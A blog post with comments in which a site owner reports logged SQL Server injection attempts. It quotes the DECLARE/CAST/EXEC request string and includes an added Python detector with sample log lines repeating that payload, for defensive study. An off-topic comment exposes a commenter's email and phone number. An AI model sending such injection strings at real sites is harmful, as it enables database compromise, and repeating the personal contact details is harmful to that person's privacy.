Seriously, WTF?
Not sure if some new worm or exploit has exploded upon the internet, but I'm seeing some really bizarre hits on my site today. Requests for stuff like:
/programming/38/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S);
What is that, an SQL injection attack for SQL Server? Which might be quite the issue if my site wasn't hosted on a Linux server. (Or, quite the issue if I was running on a webhost that hosted SQL Server on the same box as web with no firewall... which I suppose would be its own WTF.)
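A defender-side check for the request shape quoted above, added here as an example (not code from the original post): it URL-decodes each request path, including double-encoded ones, and flags the DECLARE / SET @var=CAST(0x… AS …) / EXEC(@var) pattern over constructed sample access-log lines. The IPs, timestamps and the hex literal in the sample are made-up placeholders, not the payload from the real request.

```python
import re
from urllib.parse import unquote_plus

# Shape of the request quoted above, matched after URL-decoding: a variable is
# DECLAREd, SET from a hex literal via CAST, then EXECuted (same name in all three).
HEX_CAST_EXEC = re.compile(
    r"DECLARE\s+@(\w+)\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*;"
    r"\s*SET\s+@\1\s*=\s*CAST\s*\(\s*0x[0-9a-f]+\s+AS\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)\s*;"
    r"\s*EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE,
)

# Common-log-format request line: client IP, timestamp, method, path, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def decode_request_path(path: str) -> str:
    """URL-decode, repeating while decoding still changes the string (catches double-encoding)."""
    for _ in range(3):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_hex_cast_exec_injection(path: str) -> bool:
    """True if the decoded request path carries the DECLARE/CAST(0x..)/EXEC pattern."""
    return HEX_CAST_EXEC.search(decode_request_path(path)) is not None

def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (ip, path) for every log line whose request path matches the pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and is_hex_cast_exec_injection(m.group("path")):
            hits.append((m.group("ip"), m.group("path")))
    return hits

# Constructed sample log lines: the IPs, timestamps and the 0x... literal are
# made-up placeholders, not the payload from the original request.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jun/2008:10:12:01 -0400] "GET /programming/38/ HTTP/1.1" 200 5120
10.0.0.9 - - [28/Jun/2008:10:12:07 -0400] "GET /programming/38/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x53454C45435420%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 5120
10.0.0.7 - - [28/Jun/2008:10:12:09 -0400] "GET /search?q=cast%20iron%20pan HTTP/1.1" 200 2210
"""
```

Only the second sample line is flagged; the benign query containing the word "cast" is not, because the check requires the full three-statement shape rather than a keyword.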
Comments
Yes, it's an attempted SQL injection
Although it's not necessarily specific to MS SQL server.
SQL Injection
OK... I recognized CAST from SQL Server, but the only other database server I'm familiar with is MySQL, and I've never used it there.
Interestingly enough, Chris Love mentioned this in his httpModules and httpHandlers talk at CodeStock; he said he'd seen it active in the last 36 hours.
It's been in the wild for a while
About 6 months or so (I think).
Probably someone released a new version of the script for the kiddies.
DasBlog down
http://www.hanselman.com/blog/HackedAndIDidntLikeItURLScanIsStepZero.aspx
It apparently takes down DasBlog, which ironically doesn't use a database but just plain xml files.
url rewriting for asp.net 2.0 using http handler
hi sir
please see this web site: http://site.thewebexperts.info/index.aspx
the URL query string passes the actual URL like this:
http://site.thewebexperts.info/subcategorypagedetails.aspx?cate=Services&sub=Services2
replace
I want it to be this: http://site.thewebexperts.info/subcategorypagedetails.aspx/Services/Services2
so please solve my problem and send me a full exp. to my email id: subhashyadav2007@gmail.com
ok
thanks.
subhash
9250166836